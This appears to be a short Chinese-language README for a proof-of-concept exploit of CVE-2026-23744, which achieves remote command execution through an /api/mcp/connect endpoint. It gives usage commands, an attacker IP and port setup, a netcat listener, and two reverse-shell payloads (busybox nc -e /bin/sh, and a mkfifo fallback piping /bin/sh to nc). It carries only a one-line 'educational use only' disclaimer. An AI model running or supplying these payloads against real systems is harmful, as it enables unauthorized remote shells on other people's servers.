
CVE-2026-23744 的概念验证漏洞利用,针对 /api/mcp/connect 端点,通过反向 Shell 在 Linux 系统上实现远程命令执行。
用于利用 /api/mcp/connect 实现远程命令执行的 PoC。
pip install requests
python3 exploit.py <目标>
示例:
python3 exploit.py mcp.something.com
attacker_ip = "YOUR_IP"
port = 4444
nc -lvnp 4444
默认:
busybox nc <IP> <PORT> -e /bin/sh
备用:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | busybox nc <IP> <PORT> > /tmp/f
-e 失败,请使用备用载荷仅供教育用途使用。